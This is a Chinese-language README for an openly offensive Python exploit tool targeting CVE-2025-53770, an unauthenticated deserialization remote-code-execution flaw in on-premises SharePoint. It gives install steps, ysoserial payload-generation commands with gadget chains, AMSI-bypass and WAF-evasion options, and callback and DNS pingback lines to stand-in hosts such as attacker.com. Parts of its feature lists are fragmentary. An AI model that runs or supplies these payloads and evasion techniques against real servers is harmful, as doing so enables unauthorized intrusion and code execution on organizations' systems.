一个复杂的、向导驱动的 Python 漏洞利用工具,针对 CVE-2025-53770,这是一个存在于本地部署的 Microsoft SharePoint Server(2016、2019、订阅版)中的关键(CVSS 9.8)未经认证的远程代码执行 (RCE) 漏洞。
Divine Absolute 是一款先进的、向导驱动的 Python 利用工具,针对 CVE-2025-53770——微软本地 SharePoint Server(2016、2019、订阅版)中的一个严重(CVSS 9.8)未认证远程代码执行(RCE)漏洞。该漏洞于 2025 年 7 月 19 日作为零日漏洞披露,源于 /_layouts/15/ToolPane.aspx 中对未受信任数据的反序列化。本工具专为 授权渗透测试和安全研究 设计,在侦察、利用和验证方面提供无与伦比的精确性、隐蔽性和适应性。
仓库: https://github.com/exfil0/CVE-2025-53770
⚠️ 法律警告:本工具仅供在受控环境中获得明确许可的合法授权使用。未经授权对您不拥有或未获许可的系统使用本工具是非法的,并可能导致严重的法律后果。作者对滥用行为不承担任何责任。
ToolPane.aspx 的可访问性,带有高级评分和正则表达式(例如 16.0.0.\d+-\w+?)。ToolPane.aspx 传递有效载荷,并具备强大的绕过功能。WebRequest.Create、Dns.GetHostEntry)。-enc 有效载荷)注入 AMSI 绕过(基本反射、混淆或自定义片段)。/xp.aspx、基于 UUID)。www.google.com)、自定义 URL 或内部 SharePoint 路径(例如 /_layouts/15/sharepoint.aspx)。RequestException 重试、可定制的状态码和路径。MicrosoftSharePointTeamServices)、路径(例如 /versions.aspx)和正则表达式。/_layouts/15/ToolPane.aspx 中的未认证 RCE,由反序列化引起。/ToolPane.aspx 的 POST 请求、使用 WAF 规则(例如 Cloudflare)。pip install requests termcolor
pip install pythonnet
ysoserial.exe 放置在已知路径(例如 ./ysoserial.exe)。# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS(通过 Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe 可访问,或在执行时提供其路径。运行交互式向导:
python divine_absolute.py
Recon(侦察):扫描 SharePoint 存在性和版本。Exploit(利用):向 ToolPane.aspx 发送有效载荷。Full(完整):侦察 + 利用(可选激进模式)。https://sharepoint.example.com)。ObjectDataProvider)和命令(例如 cmd /c whoami)。http://attacker.com/callback 或 sub.attacker.com)。NONE(无)、BASIC_REFLECTION(基本反射)、CONCAT_OBFUSCATED(连接混淆)或自定义片段。python divine_absolute.py
# 选择:Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# 选择:Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# 选择:Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# 选择:Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
结果保存在 xanthorox_results.json 中,包含以下字段:
target:测试的 URL。sharepoint_detected:布尔值,是否检测到 SharePoint。toolpane_accessible:布尔值,ToolPane.aspx 是否可访问。exploited:布尔值,是否发送了有效载荷。verified_rce:布尔值/None,RCE 是否确认。error:遇到的任何错误。示例:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
本版本修复了以下问题:
-enc)命令注入绕过;支持非 PowerShell(例如 cmd.exe)并给出警告。pythonnet 通过 Dns.GetHostEntry 实现可靠的 DNS 回连(实验性,需配合 gadget 以发挥完整效果)。ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 生成有效载荷,并验证 DNS 日志。pythonnet 中的 Dns.GetHostEntry 可能在没有特定 gadget 链的情况下无法触发。欢迎贡献!请遵循以下步骤:
git checkout -b feature/awesome-improvement)。git commit -m "Add awesome improvement")。git push origin feature/awesome-improvement)。本项目采用 MIT 许可证。详情请见 LICENSE。
注意:在实际使用前,请务必在受控实验室中验证有效载荷和配置。保持道德,遵守法律。
NONE(无)、FIXED(固定,例如 /xp.aspx)、RANDOM(随机,基于 UUID)。DEFAULT_SP(默认 SharePoint)、NO_REFERER(无 Referer)、RANDOM_EXTERNAL(随机外部)、CUSTOM_URL(自定义 URL)。http://127.0.0.1:8080)。/sitepages/result.txt)、正则表达式(例如 Xanthorox.*)、状态码(例如 200,403)、尝试次数、延迟和超时。